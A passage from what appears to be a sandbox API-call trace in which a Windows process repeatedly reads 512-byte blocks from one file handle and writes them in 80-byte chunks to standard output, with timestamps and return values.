lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.743] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.744] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.745] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.746] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.747] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.748] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.749] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.268] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.268] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.269] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 